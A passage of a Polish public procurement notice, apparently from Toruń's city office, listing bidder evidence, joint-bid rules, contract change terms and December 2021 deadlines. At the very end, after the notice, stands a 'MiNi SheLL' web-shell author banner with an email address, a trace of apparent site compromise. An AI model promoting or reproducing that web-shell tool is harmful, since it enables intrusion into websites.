wykonawców wspólnie ubiegających się o zamówienie,<br/>powyższy podmiotowy środek dowodowy składa każdy z Wykonawców odrębnie.Zamawiający żąda<br/>od wykonawcy, który polega na zdolnościach technicznych lub zawodowych podmiotów<br/>udostępniających zasoby na zasadach określonych w art. 118 ustawy przedstawienia podmiotowych<br/>środków dowodowych dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych<br/>podmiotów podstawy wykluczenia z postępowania.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz usług wykonanych, a w przypadku świadczeń okresowych lub<br/>ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a<br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości,<br/>przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem<br/>dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz<br/>którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a<br/>jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych<br/>dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być<br/>wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/>c. Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz ofertowy– załącznik nr 1 do SWZ,Do oferty wykonawca załącza również: a)<br/>pełnomocnictwo - gdy umocowanie osoby składającej ofertę nie wynika z dokumentów<br/>rejestrowych, wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien<br/>dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie do załączone do oferty i powinno zawierać w szczególności wskazanie:- postępowania o<br/>zamówienie publiczne, którego dotyczy,-wszystkich wykonawców ubiegających się wspólnie o<br/>udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,- ustanowionego<br/>pełnomocnika oraz zakresu jego umocowania.b)oświadczenie wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia(o ile dotyczy)-Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia, spośród których tylko jeden spełnia warunek dotyczący uprawnień, są<br/>zobowiązani dołączyć do oferty oświadczenie, zktórego wynika, które usługi wykonają<br/>poszczególni wykonawcy,c) zastrzeżenie tajemnicy przedsiębiorstwa (o ile dotyczy) – w sytuacji,<br/>gdy oferta lub inne dokumenty składane w toku postępowania będą zawierały tajemnicę<br/>przedsiębiorstwa,wykonawca, wraz z przekazaniem takich informacji, zastrzega, że nie mogą<br/>być<br/>one udostępniane, oraz wykazuje,że zastrzeżone informacje stanowią tajemnicę<br/>przedsiębiorstwa<br/>w rozumieniu przepisów ustawy z 16 kwietnia1993 r. o zwalczaniu nieuczciwej konkurencji,<br/>d)Wykaz rozwiązań równoważnych –wykonawca,który powołuje się na rozwiązania<br/>równoważne,jest zobowiązany wykazać, że oferowane przez niego rozwiązanie spełnia<br/>wymagania określone przez zamawiającego. W takim przypadku wykonawca załącza do<br/>oferty,wykaz rozwiązań równoważnych z jego opisem lub normami <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> reprezentowania ich w postępowaniu albo do reprezentowania ich w<br/>postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>pełnomocnikiem.2. W przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia<br/>oświadczenie o którym mowa wpkt 14.1. a)SWZ składają odrębnie:każdy spośród wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku oświadczenie<br/>potwierdza<br/>brak podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie,w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu;3.W przypadku wykonawców wspólnie ubiegających się o zamówienie,<br/>podmiotowe środki dowodowe składa każdy z Wykonawców odrębnie.4. Jeżeli zostanie wybrana<br/>oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający będzie<br/>żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej<br/>współpracę tych wykonawców, w której m.in. zostanie określony pełnomocnik uprawniony do<br/>kontaktów z zamawiającym oraz do wystawiania dokumentów związanych z płatnościami, przy<br/>czym termin,na jaki została zawarta umowa, nie może być krótszy niż termin realizacji<br/>zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. W przypadkach przewidzianych w umowie dopuszcza się wprowadzenie zmian za zgodą<br/>stron umowy.<br/>2. Zmiany mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.<br/>3. Dopuszczalne jest dokonanie zmian umowy:<br/>1) jeżeli zmiana umowy będzie korzystna dla Zamawiającego i dotyczyć będzie możliwości<br/>powierzenia wykonania części robót podwykonawcy robót, których zakres nie został wskazany w<br/>ofercie przez Wykonawcę jako przeznaczony do wykonania przez podwykonawców;<br/>2) gdy nastąpi w trakcie realizacji umowy zmiana wysokości stawek podatku VAT związanych z<br/>przedmiotem zamówienia, zmiana wysokości minimalnego wynagrodzenia za pracę, zmiana<br/>zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub w<br/>wysokości stawki składki na ubezpieczenia społeczne i zdrowotne oraz zmiana zasad<br/>gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w<br/>ustawie z 4 października 2018 r. o pracowniczych planach kapitałowych, jeśli zmiany te będą<br/>miały wpływ na koszty wykonania zamówienia przez Wykonawcę. Zmianie ulegnie<br/>wynagrodzenie zgodnie z postanowieniami § 3 ust. 13 i nast. umowy nie wcześniej niż z dniem<br/>wejścia w życie przepisów, z których wynikają w/w zmiany;<br/>3) jeżeli zmiana umowy dotyczyć będzie zmiany osoby lub osób sprawujących nadzór ze strony<br/>Zamawiającego (zmiana ta wymaga jedynie dokonania powiadomienia pisemnego Wykonawcy<br/>przez Zamawiającego);<br/>4) jeżeli zmiana umowy dotyczyć będzie zmiany osoby wskazanej jako kierownik robót lub nr<br/>telefonu (zmiana ta wymaga jedynie dokonania powiadomienia pisemnego Zamawiającego<br/>przez Wykonawcę);<br/>5) jeżeli zmiana umowy spowodowana będzie siłą wyższą uniemożliwiającą wykonanie<br/>przedmiotu umowy zgodnie z SWZ;<br/>4. Do każdej propozycji zmiany, inicjujący zmianę przedstawi:<br/>- opis propozycji zmiany, w tym wpływ na terminy wykonania,<br/>- uzasadnienie zmiany,<br/>- obliczenia uzasadniające ewentualną zmianę wynagrodzenia.<br/>5. Wszelkie zmiany i uzupełnienia niniejszej umowy oraz załączników, stanowiących integralną<br/>części umowy dla swojej ważności wymagają pisemnego aneksu, chyba że w umowie<br/>zastrzeżono inaczej.<br/>6. W sprawach nieuregulowanych niniejszą umową stosuje się przepisy kodeksu cywilnego i<br/>prawa zamówień publicznych.<br/>7. Rozstrzyganie sporów wynikłych przy wykonywaniu niniejszej umowy strony zgodnie poddają<br/>właściwemu Sądowi w Toruniu. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-21 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://umtorun.ezamowienia.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-21 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-19</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com